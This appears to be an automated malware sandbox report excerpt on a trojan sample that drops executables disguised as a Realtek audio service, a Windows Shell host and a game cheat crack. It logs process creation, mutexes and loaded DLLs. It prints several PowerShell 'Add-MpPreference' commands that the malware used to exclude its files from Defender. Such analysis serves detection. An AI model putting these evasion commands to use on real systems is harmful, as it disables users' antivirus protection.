                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@49/186@17/9
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_0040429B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040429B
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeMutant created: \Sessions\1\BaseNamedObjects\RMe1pa1UgjNcB2Un
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeMutant created: \Sessions\1\BaseNamedObjects\Yag44AzA1DnCVOXY
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:120:WilError_03
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeFile created: C:\Users\user\AppData\Local\Temp\nsq4158.tmpJump to behavior
                          Source: EsgeCzT4do.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: EsgeCzT4do.exeReversingLabs: Detection: 84%
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeFile read: C:\Users\user\Desktop\EsgeCzT4do.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\EsgeCzT4do.exe "C:\Users\user\Desktop\EsgeCzT4do.exe"
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe"
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe "C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe"
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe "C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe"
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://discord.gg/BNXa5rYFXM
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe'
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4292 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4184 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Realtek HD Audio Universal Service.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Shell Experience Host.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe "C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe "C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Realtek HD Audio Universal Service.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://discord.gg/BNXa5rYFXMJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4292 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4184 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
